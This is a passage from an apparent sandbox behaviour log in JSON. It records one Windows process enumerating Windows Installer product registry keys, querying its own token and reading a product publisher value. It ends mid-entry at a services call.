"HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products" } ], "repeated": 0, "id": 307 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "671B50879509DB54C8A4B5E90B2C3C78" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" } ], "repeated": 0, "id": 308 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 309 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x80\\x00\\x00\\x00" } ], "repeated": 0, "id": 310 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 311 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 312 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 313 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\xfb\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 314 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 315 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x0000023c" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 316 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000023c" }, { "name": "SubKey", "value": "671B50879509DB54C8A4B5E90B2C3C78" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" } ], "repeated": 0, "id": 317 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 318 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 319 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 320 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\x80\\x00\\x00\\x00" } ], "repeated": 0, "id": 321 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 322 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" } ], "repeated": 0, "id": 323 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 324 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 325 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 326 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" } ], "repeated": 0, "id": 327 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" } ], "repeated": 0, "id": 328 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 329 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\671B50879509DB54C8A4B5E90B2C3C78\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\671B50879509DB54C8A4B5E90B2C3C78\\InstallProperties" } ], "repeated": 0, "id": 330 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\671B50879509DB54C8A4B5E90B2C3C78\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 331 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 332 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products" } ], "repeated": 0, "id": 333 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "2" }, { "name": "Name", "value": "910A08ADB3C4AAD4CA1A96737DACFAE9" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" } ], "repeated": 0, "id": 334 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 335 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x80\\x00\\x00\\x00" } ], "repeated": 0, "id": 336 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 337 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 338 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 339 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\xfb\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 340 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 341 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x0000023c" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 342 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000023c" }, { "name": "SubKey", "value": "910A08ADB3C4AAD4CA1A96737DACFAE9" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" } ], "repeated": 0, "id": 343 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 344 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 345 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 346 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\x80\\x00\\x00\\x00" } ], "repeated": 0, "id": 347 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 348 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" } ], "repeated": 0, "id": 349 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 350 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 351 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 352 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" } ], "repeated": 0, "id": 353 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" } ], "repeated": 0, "id": 354 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 355 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9\\InstallProperties" } ], "repeated": 0, "id": 356 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Data", "value": "Microsoft Corporation" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 357 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 358 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products" } ], "repeated": 0, "id": 359 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "3" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Installer\\Products\\" } ], "repeated": 0, "id": 360 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 361 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 362 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "services", "api": 